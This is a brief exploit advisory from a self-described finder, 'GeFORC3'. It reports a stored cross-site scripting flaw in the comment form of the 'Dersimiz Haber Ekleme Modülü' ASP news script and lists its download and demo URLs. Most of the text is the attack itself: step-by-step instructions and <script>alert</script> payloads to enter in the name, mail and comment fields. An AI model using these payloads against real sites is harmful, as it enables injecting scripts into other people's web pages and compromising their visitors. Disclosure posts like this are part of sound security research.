Dersimiz Haber Ekleme Modülü XSS Vulnerability

#Software: Dersimiz Haber Ekleme Modülü
#download: http://www.aspindir.com/goster/5070
#demo: http://radyom.somee.com/ceyhantasarim/
#Found By: GeFORC3 ( G3 )


#Exploit & example :

http://example.com/script_path/ulakbutun.asp?id=27    (27=examle id )

write to xss code in Yorum ekle(comment)
exp:
İsim: <script>alert("G3");</script>
mail:<script>alert("G3");</script>
Yorumunuz: <script>alert("G3");</script>


Press to "gönder"(send) button.

This xss works on "Dersimiz Haber Ekleme Modülü" script's news page

-----------------------------------------------------
WwW.GeFORC3.ORG  |  WwW.HeykirBlog.Org  |  WwW.NetKaBus.CoM